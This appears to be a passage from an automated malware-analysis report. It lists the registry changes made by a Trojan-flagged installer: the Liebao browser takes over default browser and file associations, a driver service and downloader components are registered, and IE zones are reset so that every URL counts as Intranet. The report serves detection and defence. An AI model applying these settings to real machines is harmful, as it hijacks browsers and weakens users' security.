[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"DisplayVersion" = "4.5.34.6725"
[HKCU\Software\Kingsoft\KBROWSER]
"Report" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\liebao]
"Install Path Dir" = "%Program Files%\liebao"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"UninstallString" = "%Program Files%\liebao\4.5.34.6725\uninst.exe"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\liebao]
"ver" = "4.5.34.6725"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\liebao\Coop]
"PreOEM" = "h_home"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\liebao]
"SPID" = "82685"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Kingsoft\KBROWSER]
"InstallTime" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"DisplayIcon" = "%Program Files%\liebao\4.5.34.6725\uninst.exe"
[HKLM\SOFTWARE\liebao\Coop]
"oem" = "h_home"
[HKLM\SOFTWARE\liebao]
"PID" = "66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"ImagePath" = "%Program Files%\liebao\4.5.34.6725\knbcenter.exe"
[HKLM\SOFTWARE\liebao]
"hid" = "a8a67a25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\liebao]
"InstallTime" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1B BE EF 3F 2B 30 3A 4A 78 B8 A0 78 B6 03 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"Publisher" = "猎豹工作室"
"DisplayName" = "猎豹安全浏览器"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\liebao]
"old_def_browser" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\liebao\Coop]
"OEMName" = "h_home"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"URLInfoAbout" = "http://www.ijinshan.com"
The process %original file name%.exe:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 12 33 7A 7B 09 F9 70 73 8A 1F 01 0C 7D 7E 12"
The process KNBCenter.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA AD 6F 16 BF 2C A4 6E E6 5C D7 8C 78 F0 97 2A"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"DisplayName" = "KNBDrv"
[HKCU\Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}]
"svrid" = "l99zivdyl8kcx8rr2ed8snx5acet"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\liebao]
"AppDataPath" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKU\.DEFAULT\Software\Kingsoft\KBROWSER]
"vtime" = "1400765614"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"Type" = "1"
[HKLM\SOFTWARE\liebao]
"ProgramPath" = "%Program Files%\liebao\4.5.34.6725\"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"ImagePath" = "\??\%System%\drivers\KNBDrv.sys"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"Start" = "3"
The process regsvr32.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D6 D7 EF 3E E1 02 A0 BA 23 2F D6 7E A6 42 D4"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\DownloadProxyPS.dll"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
The process liebao.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 20 3E E7 F7 95 81 37 6F 11 C2 C7 B4 E0 9F 62"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process liebao.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\Liebao.URL\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKCR\ftp\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\%Program Files%\liebao]
"liebao.exe" = "猎豹安全浏览器"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\.htm]
"(Default)" = "Liebao.HTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"http" = "Liebao.URL"
[HKCU\Software\Classes\htmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCU\Software\Classes\Liebao.URL]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Classes\InternetShortcut\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\Liebao.HTML\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".html" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\InternetShortcut\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xhtml" = "Liebao.HTML"
".shtml" = "Liebao.HTML"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.HTML\shell\open\ddeexec]
"(Default)" = ""
[HKCR\file\shell]
"(Default)" = "open"
[HKCR\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs]
"(Default)" = "{0002DF01-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKCU\Software\Classes\Liebao.HTML]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"ftp" = "Liebao.URL"
"https" = "Liebao.URL"
[HKCU\Software\Classes\http\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\.html]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "Liebao.HTML"
[HKCR\https\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\file\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\Liebao.HTML]
"(Default)" = "Liebao HTML Document"
[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\.html]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\HTTP\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\.shtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\Liebao.HTML]
"URL Protocol" = ""
[HKCR\Liebao.URL]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid" = "Liebao.URL"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.URL\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationName" = "猎豹安全浏览器"
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationName" = "猎豹安全浏览器"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xht" = "Liebao.HTML"
[HKCR\.htm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\RegisteredApplications]
"liebao.exe" = "Software\Clients\StartMenuInternet\liebao.exe\Capabilities"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\ftp\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\.xhtml]
"(Default)" = "Liebao.HTML"
[HKCR\htmlfile\shell]
"(Default)" = "open"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\http\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\.mht]
"(Default)" = "Liebao.HTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xht" = "Liebao.HTML"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 55 60 41 78 CC 8B 9B EE 7C ED A9 71 E0 2E EE"
[HKCU\Software\Classes\file\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"http" = "Liebao.URL"
[HKCU\Software\Classes\.mhtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\https\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid" = "Liebao.URL"
[HKCR\Liebao.HTML\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\Liebao.HTML\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\htmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"https" = "Liebao.URL"
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.shtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\mhtmlfile\shell]
"(Default)" = "open"
[HKCR\AppID\{0002DF01-0000-0000-C000-000000000046}]
"(Default)" = "Internet Explorer(Ver 1.0)"
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\.mhtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\InternetShortcut\shell]
"(Default)" = "open"
[HKCU\Software\Classes\Liebao.HTML\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\Liebao.URL\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\ftp\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationDescription" = "猎豹安全浏览器是由金山网络历时半年多开发、推出的主打安全与极速特性的浏览器,界面炫酷,采用Trident和WebKit双渲染引擎,并整合金山自家的BIPS进行安全防护。猎豹安全浏览器对Chrome的Webkit内核进行了超过100项的技术优化,使访问网页的速度更快。其具有首创的智能切换引擎,动态选择内核匹配不同网页,并且完美支持HTML5新国际网页标准。极速浏览的同时也充分保证兼容性。"
[HKCR\https\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\Liebao.URL\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe]
"(Default)" = "猎豹安全浏览器"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCR\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".html" = "Liebao.HTML"
[HKCU\Software\Classes\.shtml]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCR\.mhtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationDescription" = "猎豹安全浏览器是由金山网络历时半年多开发、推出的主打安全与极速特性的浏览器,界面炫酷,采用Trident和WebKit双渲染引擎,并整合金山自家的BIPS进行安全防护。猎豹安全浏览器对Chrome的Webkit内核进行了超过100项的技术优化,使访问网页的速度更快。其具有首创的智能切换引擎,动态选择内核匹配不同网页,并且完美支持HTML5新国际网页标准。极速浏览的同时也充分保证兼容性。"
[HKCR\.mhtml]
"(Default)" = "Liebao.HTML"
[HKCR\Liebao.HTML\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\AppID\{0002DF01-0000-0000-C000-000000000046}]
"(Default)" = "Internet Explorer(Ver 1.0)"
[HKCR\file\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\htmlfile\shell]
"(Default)" = "open"
[HKCU\Software\Classes\mhtmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCU\Software\Classes\Liebao.URL]
"URL Protocol" = ""
[HKCU\Software\TENCENT\Traveler]
"EXE" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\.mht]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\TENCENT\Traveler]
"EXE" = "%Program Files%\liebao\liebao.exe"
[HKCR\mhtmlfile\shell]
"(Default)" = "open"
[HKCR\Liebao.URL]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Classes\.shtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.HTML\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".shtml" = "Liebao.HTML"
[HKCU\Software\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs]
"(Default)" = "{0002DF01-0000-0000-C000-000000000046}"
[HKCR\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\%Program Files%\liebao]
"liebao.exe" = "猎豹安全浏览器"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"ftp" = "Liebao.URL"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "liebao.exe"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xhtml" = "Liebao.HTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe]
"(Default)" = "猎豹安全浏览器"
[HKCU\Software\RegisteredApplications]
"liebao.exe" = "Software\Clients\StartMenuInternet\liebao.exe\Capabilities"
[HKCR\Liebao.HTML\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Classes\Liebao.HTML]
"URL Protocol" = ""
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec]
"NoActivateHandler" = ""
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Classes\https\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\ftp\shell]
"(Default)" = "open"
[HKCR\InternetShortcut\shell]
"(Default)" = "open"
[HKCR\Liebao.URL\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".htm" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.URL\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\https\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\.xht]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".htm" = "Liebao.HTML"
[HKCR\mhtmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\ftp\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "liebao.exe"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\Liebao.HTML\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid" = "Liebao.URL"
The process down_s_66_82685.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\liebao]
"UID" = "3c5f6e2b73049b0ecc3362e627a51fa3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 D9 BF FE 0E 04 BC E1 BC 7C 6C CD 9F 39 6E 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Kingsoft\KBROWSER]
"vtime" = "1400765523"
[HKCR\CLSID\{DA3CB2BC-1CCA-412d-BC7C-4DFB532D2223}\Implemented Categories\{D7BD91AA-CB34-4eae-A9D1-2DB9A7C6815C}]
"UID" = "3c5f6e2b73049b0ecc3362e627a51fa3"
The Trojan modifies IE security-zone settings so that all local web-nodes with no dots in their names (which do not belong to any zone) are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ping.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 D9 13 7E 78 4F 19 0C 9D 6E 39 7A 0B 14 D6 07"
The process tencentdl.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}]
"(Default)" = "Downloader Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
